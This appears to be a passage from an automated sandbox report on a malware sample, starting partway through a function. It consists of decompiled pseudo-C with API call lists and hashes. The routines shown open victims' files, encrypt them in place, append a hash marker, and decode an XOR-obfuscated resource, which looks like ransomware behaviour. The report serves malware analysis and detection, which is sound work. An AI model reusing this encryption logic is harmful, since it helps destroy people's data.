                                                                                                                                                  				void* _t77;
                                                                                                                                                  				void* _t80;
                                                                                                                                                  				void* _t81;
                                                                                                                                                  				void* _t82;
                                                                                                                                                  
                                                                                                                                                  				_t63 = 8;
                                                                                                                                                  				_v56.dwOemId = 0;
                                                                                                                                                  				memset( &(_v56.dwPageSize), 0, _t63 << 2);
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				GetSystemInfo( &_v56); // executed
                                                                                                                                                  				_t7 = _a16 + 0x44; // 0x15ff4877
                                                                                                                                                  				_t80 =  *_t7 + 0x16;
                                                                                                                                                  				_t76 = _a8 - _t80;
                                                                                                                                                  				asm("sbb [ebp+0x10], ebx");
                                                                                                                                                  				asm("adc edx, [ebp+0x10]");
                                                                                                                                                  				asm("sbb edx, eax");
                                                                                                                                                  				_a8 = _t76;
                                                                                                                                                  				_t43 = E0477A6B0(_v56.dwAllocationGranularity + _t76 - 1, 0, _v56.dwAllocationGranularity, 0);
                                                                                                                                                  				asm("sbb edx, 0x0");
                                                                                                                                                  				_t45 = E0477A670(_t43 - 1, 0, _v56.dwAllocationGranularity, 0);
                                                                                                                                                  				_t77 = _t76 - _t45;
                                                                                                                                                  				_t62 = _t77 + _t80;
                                                                                                                                                  				_t46 = MapViewOfFile(_a4, 6, 0, _t45, _t62); // executed
                                                                                                                                                  				_t81 = _t46;
                                                                                                                                                  				_v8 = _t81;
                                                                                                                                                  				if(_t81 != 0) {
                                                                                                                                                  					_a4 = 0;
                                                                                                                                                  					_t49 = _a16;
                                                                                                                                                  					_t17 = _t49 + 0x40; // 0xff0975e4
                                                                                                                                                  					__imp__CryptDuplicateHash( *_t17, 0, 0,  &_a4);
                                                                                                                                                  					if(_t49 != 0) {
                                                                                                                                                  						_t82 = _t81 + _t77;
                                                                                                                                                  						__imp__CryptHashData(_a4, _t82, 4, 0);
                                                                                                                                                  						if(_t49 != 0) {
                                                                                                                                                  							_t20 = _a16 + 0x44; // 0x15ff4877
                                                                                                                                                  							_t52 =  *_t20;
                                                                                                                                                  							_v12 = _t52;
                                                                                                                                                  							_t53 = LocalAlloc(0x40, _t52);
                                                                                                                                                  							_v16 = _t53;
                                                                                                                                                  							if(_t53 != 0) {
                                                                                                                                                  								__imp__CryptGetHashParam(_a4, 2, _t53,  &_v12, 0);
                                                                                                                                                  								if(_t53 != 0) {
                                                                                                                                                  									memcpy(_t82 + 4, _v16, _v12);
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsw");
                                                                                                                                                  									_v20 = FlushViewOfFile(_v8, _t62);
                                                                                                                                                  								}
                                                                                                                                                  								LocalFree(_v16);
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						__imp__CryptDestroyHash(_a4);
                                                                                                                                                  					}
                                                                                                                                                  					UnmapViewOfFile(_v8);
                                                                                                                                                  				}
                                                                                                                                                  				return _v20;
                                                                                                                                                  			}





















                                                                                                                                                  0x04775bd1
                                                                                                                                                  0x04775bd4
                                                                                                                                                  0x04775bda
                                                                                                                                                  0x04775be0
                                                                                                                                                  0x04775be3
                                                                                                                                                  0x04775bec
                                                                                                                                                  0x04775bf2
                                                                                                                                                  0x04775bf5
                                                                                                                                                  0x04775bf7
                                                                                                                                                  0x04775c05
                                                                                                                                                  0x04775c0d
                                                                                                                                                  0x04775c11
                                                                                                                                                  0x04775c14
                                                                                                                                                  0x04775c1e
                                                                                                                                                  0x04775c27
                                                                                                                                                  0x04775c2c
                                                                                                                                                  0x04775c2e
                                                                                                                                                  0x04775c39
                                                                                                                                                  0x04775c3f
                                                                                                                                                  0x04775c43
                                                                                                                                                  0x04775c48
                                                                                                                                                  0x04775c54
                                                                                                                                                  0x04775c57
                                                                                                                                                  0x04775c5a
                                                                                                                                                  0x04775c5d
                                                                                                                                                  0x04775c65
                                                                                                                                                  0x04775c6f
                                                                                                                                                  0x04775c75
                                                                                                                                                  0x04775c7d
                                                                                                                                                  0x04775c82
                                                                                                                                                  0x04775c82
                                                                                                                                                  0x04775c88
                                                                                                                                                  0x04775c8b
                                                                                                                                                  0x04775c91
                                                                                                                                                  0x04775c96
                                                                                                                                                  0x04775ca4
                                                                                                                                                  0x04775cac
                                                                                                                                                  0x04775cb8
                                                                                                                                                  0x04775ccf
                                                                                                                                                  0x04775cd0
                                                                                                                                                  0x04775cd1
                                                                                                                                                  0x04775cd5
                                                                                                                                                  0x04775cda
                                                                                                                                                  0x04775ce2
                                                                                                                                                  0x04775ce2
                                                                                                                                                  0x04775ce8
                                                                                                                                                  0x04775ce8
                                                                                                                                                  0x04775c96
                                                                                                                                                  0x04775cf1
                                                                                                                                                  0x04775cf1
                                                                                                                                                  0x04775cfa
                                                                                                                                                  0x04775cfa
                                                                                                                                                  0x04775d07

                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemInfo.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,?,?,?,04775E4C,?,?,00000000), ref: 04775BE3
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04775C14
                                                                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04775C39
                                                                                                                                                  • CryptDuplicateHash.ADVAPI32(FF0975E4,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04775C5D
                                                                                                                                                  • CryptHashData.ADVAPI32(00000000,00000000,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04775C75
                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,15FF4877,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04775C8B
                                                                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04775CA4
                                                                                                                                                  • memcpy.MSVCRT ref: 04775CB8
                                                                                                                                                  • FlushViewOfFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,04775E4C,?,?), ref: 04775CDC
                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04775CE8
                                                                                                                                                  • CryptDestroyHash.ADVAPI32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04775CF1
                                                                                                                                                  • UnmapViewOfFile.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04775CFA
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CryptHash$FileView$Local$AllocDataDestroyDuplicateFlushFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@memcpy
                                                                                                                                                  • String ID: encrypted
                                                                                                                                                  • API String ID: 3326259677-1467498611
                                                                                                                                                  • Opcode ID: ec7ec11870dcdbd7829453ad664f4eb281385100a16c8ed98cbc1df6cafea2ad
                                                                                                                                                  • Instruction ID: 25262a2a94c192f7012a684ec419a377c64d6a7b5e971e878c5fe52cddc5bf2b
                                                                                                                                                  • Opcode Fuzzy Hash: ec7ec11870dcdbd7829453ad664f4eb281385100a16c8ed98cbc1df6cafea2ad
                                                                                                                                                  • Instruction Fuzzy Hash: 4041F6B2A00109BFEB10DF64DD88EEE7BB9FF44344F418525BA05E6250DB75AE148BA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                  			E04775D0A(void* __edx, long _a4, intOrPtr _a8) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				long _v16;
                                                                                                                                                  				char _v20;
                                                                                                                                                  				long _v24;
                                                                                                                                                  				void* _v28;
                                                                                                                                                  				char _v32;
                                                                                                                                                  				signed int _v36;
                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                  				signed int _v44;
                                                                                                                                                  				int _t52;
                                                                                                                                                  				void* _t53;
                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _t56;
                                                                                                                                                  				void* _t57;
                                                                                                                                                  				void* _t59;
                                                                                                                                                  				void* _t63;
                                                                                                                                                  				void* _t67;
                                                                                                                                                  				signed int _t69;
                                                                                                                                                  				void* _t70;
                                                                                                                                                  				intOrPtr _t80;
                                                                                                                                                  				long _t82;
                                                                                                                                                  				intOrPtr _t89;
                                                                                                                                                  
                                                                                                                                                  				_t80 = _a8;
                                                                                                                                                  				_t82 = 0;
                                                                                                                                                  				_t52 =  &_v16;
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				_v32 = 0;
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				__imp__CryptDuplicateKey( *((intOrPtr*)(_t80 + 0x3c)), 0, 0, _t52); // executed
                                                                                                                                                  				if(_t52 == 0) {
                                                                                                                                                  					L21:
                                                                                                                                                  					return _t52;
                                                                                                                                                  				}
                                                                                                                                                  				_t53 = CreateFileW(_a4, 0xc0000000, 0, 0, 3, 0, 0); // executed
                                                                                                                                                  				_v12 = _t53;
                                                                                                                                                  				if(_t53 == 0xffffffff) {
                                                                                                                                                  					L18:
                                                                                                                                                  					_t52 = CryptDestroyKey(_v16);
                                                                                                                                                  					if(_v20 == _t82 || _v32 != _t82) {
                                                                                                                                                  						goto L21;
                                                                                                                                                  					} else {
                                                                                                                                                  						return SetEvent( *(_t80 + 0x48));
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_v24 = 0;
                                                                                                                                                  				__imp__GetFileSizeEx(_t53,  &_v44);
                                                                                                                                                  				_t73 = _v40;
                                                                                                                                                  				_t69 = _v44;
                                                                                                                                                  				_a4 = 0x1000000;
                                                                                                                                                  				_t89 = _v40;
                                                                                                                                                  				if(_t89 <= 0 && (_t89 < 0 || _t69 < 0x1000000)) {
                                                                                                                                                  					_v24 = 1;
                                                                                                                                                  					_a4 = _t69;
                                                                                                                                                  					_t67 = E0477A6B0(_t69, _t73, 0x10, _t82);
                                                                                                                                                  					asm("adc edx, esi");
                                                                                                                                                  					_t69 = _t67 + 1 << 4;
                                                                                                                                                  				}
                                                                                                                                                  				_t56 = 0;
                                                                                                                                                  				asm("adc edi, ecx");
                                                                                                                                                  				_t85 =  *((intOrPtr*)(_t80 + 0x44)) + _t69 + 0x12;
                                                                                                                                                  				asm("adc edi, eax");
                                                                                                                                                  				_t57 = CreateFileMappingW(_v12, _t56, 4, 0,  *((intOrPtr*)(_t80 + 0x44)) + _t69 + 0x12, _t56); // executed
                                                                                                                                                  				_v8 = _t57;
                                                                                                                                                  				_t92 = _t57;
                                                                                                                                                  				if(_t57 == 0) {
                                                                                                                                                  					L17:
                                                                                                                                                  					CloseHandle(_v12);
                                                                                                                                                  					_t80 = _a8;
                                                                                                                                                  					_t82 = 0;
                                                                                                                                                  					goto L18;
                                                                                                                                                  				}
                                                                                                                                                  				_v36 = _v36 & 0x00000000;
                                                                                                                                                  				_t59 = E04775A73(_t92, _t57, _v44, _v40, _a8,  &_v20,  &_v32); // executed
                                                                                                                                                  				if(_t59 == 0 || _v20 != 0) {
                                                                                                                                                  					L14:
                                                                                                                                                  					_t70 = _v36;
                                                                                                                                                  					goto L15;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t63 = MapViewOfFile(_v8, 6, 0, 0, _a4); // executed
                                                                                                                                                  					_v28 = _t63;
                                                                                                                                                  					if(_t63 == 0) {
                                                                                                                                                  						goto L14;
                                                                                                                                                  					}
                                                                                                                                                  					__imp__CryptEncrypt(_v16, 0, _v24, 0, _t63,  &_a4, _t69);
                                                                                                                                                  					_t70 = _t63;
                                                                                                                                                  					if(_t70 != 0) {
                                                                                                                                                  						FlushViewOfFile(_v28, _a4);
                                                                                                                                                  					}
                                                                                                                                                  					UnmapViewOfFile(_v28);
                                                                                                                                                  					_t97 = _t70;
                                                                                                                                                  					if(_t70 != 0) {
                                                                                                                                                  						E04775BC4(_t97, _v8, _t85, 0, _a8); // executed
                                                                                                                                                  					}
                                                                                                                                                  					L15:
                                                                                                                                                  					FindCloseChangeNotification(_v8); // executed
                                                                                                                                                  					if(_t70 == 0) {
                                                                                                                                                  						asm("sbb edi, [ebp-0x24]");
                                                                                                                                                  						E04775A11(_v12, _t85 - _v44, 0);
                                                                                                                                                  					}
                                                                                                                                                  					goto L17;
                                                                                                                                                  				}
                                                                                                                                                  			}

























                                                                                                                                                  0x04775d13
                                                                                                                                                  0x04775d16
                                                                                                                                                  0x04775d18
                                                                                                                                                  0x04775d21
                                                                                                                                                  0x04775d24
                                                                                                                                                  0x04775d27
                                                                                                                                                  0x04775d2a
                                                                                                                                                  0x04775d32
                                                                                                                                                  0x04775e9c
                                                                                                                                                  0x04775e9c
                                                                                                                                                  0x04775e9c
                                                                                                                                                  0x04775d46
                                                                                                                                                  0x04775d4c
                                                                                                                                                  0x04775d52
                                                                                                                                                  0x04775e7c
                                                                                                                                                  0x04775e7f
                                                                                                                                                  0x04775e88
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775e8f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775e92
                                                                                                                                                  0x04775e88
                                                                                                                                                  0x04775d5d
                                                                                                                                                  0x04775d60
                                                                                                                                                  0x04775d66
                                                                                                                                                  0x04775d69
                                                                                                                                                  0x04775d71
                                                                                                                                                  0x04775d74
                                                                                                                                                  0x04775d76
                                                                                                                                                  0x04775d83
                                                                                                                                                  0x04775d8a
                                                                                                                                                  0x04775d8d
                                                                                                                                                  0x04775d95
                                                                                                                                                  0x04775d9f
                                                                                                                                                  0x04775d9f
                                                                                                                                                  0x04775da7
                                                                                                                                                  0x04775dad
                                                                                                                                                  0x04775daf
                                                                                                                                                  0x04775db3
                                                                                                                                                  0x04775dbc
                                                                                                                                                  0x04775dc2
                                                                                                                                                  0x04775dc5
                                                                                                                                                  0x04775dc7
                                                                                                                                                  0x04775e6e
                                                                                                                                                  0x04775e71
                                                                                                                                                  0x04775e77
                                                                                                                                                  0x04775e7a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775e7a
                                                                                                                                                  0x04775dcd
                                                                                                                                                  0x04775de3
                                                                                                                                                  0x04775dea
                                                                                                                                                  0x04775e4e
                                                                                                                                                  0x04775e4e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775df3
                                                                                                                                                  0x04775dfd
                                                                                                                                                  0x04775e03
                                                                                                                                                  0x04775e08
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775e1a
                                                                                                                                                  0x04775e20
                                                                                                                                                  0x04775e24
                                                                                                                                                  0x04775e2c
                                                                                                                                                  0x04775e2c
                                                                                                                                                  0x04775e35
                                                                                                                                                  0x04775e3b
                                                                                                                                                  0x04775e3d
                                                                                                                                                  0x04775e47
                                                                                                                                                  0x04775e47
                                                                                                                                                  0x04775e51
                                                                                                                                                  0x04775e54
                                                                                                                                                  0x04775e5c
                                                                                                                                                  0x04775e61
                                                                                                                                                  0x04775e69
                                                                                                                                                  0x04775e69
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775e5c

                                                                                                                                                  APIs
                                                                                                                                                  • CryptDuplicateKey.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000), ref: 04775D2A
                                                                                                                                                  • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 04775D46
                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 04775D60
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04775D8D
                                                                                                                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,?,00000000), ref: 04775DBC
                                                                                                                                                  • MapViewOfFile.KERNELBASE(?,00000006,00000000,00000000,?,00000000,?,?,?,00000010,?), ref: 04775DFD
                                                                                                                                                  • CryptEncrypt.ADVAPI32(?,00000000,?,00000000,00000000,?,?), ref: 04775E1A
                                                                                                                                                  • FlushViewOfFile.KERNEL32(?,?), ref: 04775E2C
                                                                                                                                                  • UnmapViewOfFile.KERNEL32(?), ref: 04775E35
                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?,00000000,?,?,?,00000010,?), ref: 04775E54
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 04775E71
                                                                                                                                                  • CryptDestroyKey.ADVAPI32(?), ref: 04775E7F
                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 04775E92
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$CryptView$CloseCreate$ChangeDestroyDuplicateEncryptEventFindFlushHandleMappingNotificationSizeUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3885221687-0
                                                                                                                                                  • Opcode ID: c54c8b2123f432e887ead9022e404d15fd8a90071ba48a7391f0f1f0876358e5
                                                                                                                                                  • Instruction ID: 89afa961a314545e9466315a2246c4783f91ed1981737f0c5cd08f5fbe482e91
                                                                                                                                                  • Opcode Fuzzy Hash: c54c8b2123f432e887ead9022e404d15fd8a90071ba48a7391f0f1f0876358e5
                                                                                                                                                  • Instruction Fuzzy Hash: 9C515D72900219BBDF219FA1CC48EEFBF79EF08750F558029FA05B6250D775AA40DBA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04778313(signed int __eax, void _a4, void* _a8) {
                                                                                                                                                  				int _v8;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				void* _t22;
                                                                                                                                                  				long _t23;
                                                                                                                                                  				void* _t25;
                                                                                                                                                  				int _t27;
                                                                                                                                                  				void* _t29;
                                                                                                                                                  				void* _t32;
                                                                                                                                                  				void* _t35;
                                                                                                                                                  				void** _t39;
                                                                                                                                                  				long _t46;
                                                                                                                                                  				void* _t48;
                                                                                                                                                  				struct HRSRC__* _t50;
                                                                                                                                                  
                                                                                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                                                                                  				_t50 = FindResourceW( *0x4787b98, __eax & 0x0000ffff, 6);
                                                                                                                                                  				if(_t50 == 0) {
                                                                                                                                                  					L17:
                                                                                                                                                  					return _v12;
                                                                                                                                                  				}
                                                                                                                                                  				_t21 = LoadResource( *0x4787b98, _t50);
                                                                                                                                                  				if(_t21 == 0) {
                                                                                                                                                  					goto L17;
                                                                                                                                                  				}
                                                                                                                                                  				_t22 = LockResource(_t21);
                                                                                                                                                  				_v16 = _t22;
                                                                                                                                                  				if(_t22 == 0) {
                                                                                                                                                  					goto L17;
                                                                                                                                                  				}
                                                                                                                                                  				_t23 = SizeofResource( *0x4787b98, _t50);
                                                                                                                                                  				_v8 = _t23;
                                                                                                                                                  				if(_t23 == 0) {
                                                                                                                                                  					goto L17;
                                                                                                                                                  				}
                                                                                                                                                  				_t25 = RtlAllocateHeap(GetProcessHeap(), 0, _t23); // executed
                                                                                                                                                  				_t48 = _t25;
                                                                                                                                                  				if(_t48 == 0) {
                                                                                                                                                  					L16:
                                                                                                                                                  					goto L17;
                                                                                                                                                  				}
                                                                                                                                                  				memcpy(_t48, _v16, _v8);
                                                                                                                                                  				_t27 = _v8;
                                                                                                                                                  				if(_t27 == 0) {
                                                                                                                                                  					L9:
                                                                                                                                                  					_t29 = RtlAllocateHeap(GetProcessHeap(), 8,  *_t48); // executed
                                                                                                                                                  					_t39 = _a4;
                                                                                                                                                  					 *_t39 = _t29;
                                                                                                                                                  					if(_t29 != 0) {
                                                                                                                                                  						_a4 =  *_t48;
                                                                                                                                                  						_t11 = _t48 + 4; // 0x4
                                                                                                                                                  						_t32 = E0477A790(_t29,  &_a4, _t11, _v8 + 0xfffffffc); // executed
                                                                                                                                                  						if(_t32 != 0) {
                                                                                                                                                  							HeapFree(GetProcessHeap(), 0,  *_t39);
                                                                                                                                                  						} else {
                                                                                                                                                  							_t35 = _a8;
                                                                                                                                                  							if(_t35 != 0) {
                                                                                                                                                  								 *_t35 = _a4;
                                                                                                                                                  							}
                                                                                                                                                  							_v12 = 1;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					RtlFreeHeap(GetProcessHeap(), 0, _t48); // executed
                                                                                                                                                  					goto L16;
                                                                                                                                                  				}
                                                                                                                                                  				_t46 =  *_t48;
                                                                                                                                                  				do {
                                                                                                                                                  					_t46 = _t46 ^ 0x000000e9;
                                                                                                                                                  					_t27 = _t27 - 1;
                                                                                                                                                  				} while (_t27 != 0);
                                                                                                                                                  				 *_t48 = _t46;
                                                                                                                                                  				goto L9;
                                                                                                                                                  			}


















                                                                                                                                                  0x04778319
                                                                                                                                                  0x04778330
                                                                                                                                                  0x04778334
                                                                                                                                                  0x04778415
                                                                                                                                                  0x0477841a
                                                                                                                                                  0x0477841a
                                                                                                                                                  0x04778341
                                                                                                                                                  0x04778349
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778350
                                                                                                                                                  0x04778356
                                                                                                                                                  0x0477835b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778368
                                                                                                                                                  0x0477836e
                                                                                                                                                  0x04778373
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477838d
                                                                                                                                                  0x0477838f
                                                                                                                                                  0x04778393
                                                                                                                                                  0x04778413
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778414
                                                                                                                                                  0x0477839c
                                                                                                                                                  0x047783a1
                                                                                                                                                  0x047783a9
                                                                                                                                                  0x047783b5
                                                                                                                                                  0x047783bc
                                                                                                                                                  0x047783be
                                                                                                                                                  0x047783c1
                                                                                                                                                  0x047783c5
                                                                                                                                                  0x047783c9
                                                                                                                                                  0x047783d3
                                                                                                                                                  0x047783dc
                                                                                                                                                  0x047783e3
                                                                                                                                                  0x04778401
                                                                                                                                                  0x047783e5
                                                                                                                                                  0x047783e5
                                                                                                                                                  0x047783ea
                                                                                                                                                  0x047783ef
                                                                                                                                                  0x047783ef
                                                                                                                                                  0x047783f1
                                                                                                                                                  0x047783f1
                                                                                                                                                  0x047783e3
                                                                                                                                                  0x0477840d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477840d
                                                                                                                                                  0x047783ab
                                                                                                                                                  0x047783ad
                                                                                                                                                  0x047783ad
                                                                                                                                                  0x047783b0
                                                                                                                                                  0x047783b0
                                                                                                                                                  0x047783b3
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 0477832A
                                                                                                                                                  • LoadResource.KERNEL32(00000000), ref: 04778341
                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 04778350
                                                                                                                                                  • SizeofResource.KERNEL32(00000000), ref: 04778368
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04778384
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0477838D
                                                                                                                                                  • memcpy.MSVCRT ref: 0477839C
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 047783B9
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 047783BC
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000004,?,?,?,?,00000002), ref: 047783FE
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,00000002), ref: 04778401
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 0477840A
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 0477840D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$ProcessResource$AllocateFree$FindLoadLockSizeofmemcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3010137425-0
                                                                                                                                                  • Opcode ID: 6ef44541d92bbcdeb039d46726a9a337a3b83aa1a68b2386b5946a10eb0f50c6
                                                                                                                                                  • Instruction ID: 56b1c71ea85ab7ec00f5574ac4a7ec44c267d8f9a7eb9b1ffaa5d2de94235840
                                                                                                                                                  • Opcode Fuzzy Hash: 6ef44541d92bbcdeb039d46726a9a337a3b83aa1a68b2386b5946a10eb0f50c6
                                                                                                                                                  • Instruction Fuzzy Hash: 6F314D71A00205ABDF21AFA9DC48FAE7FA9EF44354F618065F915D6380EB74E910CBA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 40%
                                                                                                                                                  			E04775A73(void* __eflags, void* _a4, intOrPtr _a8, long _a16, signed int* _a20, signed int* _a24) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				struct _SYSTEM_INFO _v48;
                                                                                                                                                  				void* _t45;
                                                                                                                                                  				long _t47;
                                                                                                                                                  				void* _t48;
                                                                                                                                                  				signed int _t51;
                                                                                                                                                  				void** _t53;
                                                                                                                                                  				long _t54;
                                                                                                                                                  				long* _t56;
                                                                                                                                                  				void* _t62;
                                                                                                                                                  				void* _t63;
                                                                                                                                                  				signed int _t64;
                                                                                                                                                  				long _t78;
                                                                                                                                                  				intOrPtr _t82;
                                                                                                                                                  				void* _t88;
                                                                                                                                                  				void* _t98;
                                                                                                                                                  				long* _t103;
                                                                                                                                                  
                                                                                                                                                  				_t64 = 8;
                                                                                                                                                  				_v48.dwOemId = 0;
                                                                                                                                                  				memset( &(_v48.dwPageSize), 0, _t64 << 2);
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				GetSystemInfo( &_v48); // executed
                                                                                                                                                  				_t88 =  *(_a16 + 0x44) + 0x16;
                                                                                                                                                  				_t82 = _a8 - _t88;
                                                                                                                                                  				asm("sbb [ebp+0x10], ebx");
                                                                                                                                                  				_t61 = _v48.dwAllocationGranularity;
                                                                                                                                                  				asm("adc edx, [ebp+0x10]");
                                                                                                                                                  				asm("sbb edx, eax");
                                                                                                                                                  				_a8 = _t82;
                                                                                                                                                  				_t45 = E0477A6B0(_v48.dwAllocationGranularity + _t82 - 1, 0, _v48.dwAllocationGranularity, 0);
                                                                                                                                                  				asm("sbb edx, 0x0");
                                                                                                                                                  				_t47 = E0477A670(_t45 - 1, 0, _t61, 0);
                                                                                                                                                  				_t62 = _t82 - _t47;
                                                                                                                                                  				_t48 = MapViewOfFile(_a4, 4, 0, _t47, _t62 + _t88); // executed
                                                                                                                                                  				_v12 = _t48;
                                                                                                                                                  				_t98 = _t48;
                                                                                                                                                  				if(_t98 != 0) {
                                                                                                                                                  					_t78 = _a16;
                                                                                                                                                  					_push(9);
                                                                                                                                                  					asm("repe cmpsw");
                                                                                                                                                  					_t51 = 0 | _t98 == 0x00000000;
                                                                                                                                                  					 *_a20 = _t51;
                                                                                                                                                  					if(_t51 == 0) {
                                                                                                                                                  						_v8 = 1;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t53 =  &_a4;
                                                                                                                                                  						_a4 = 0;
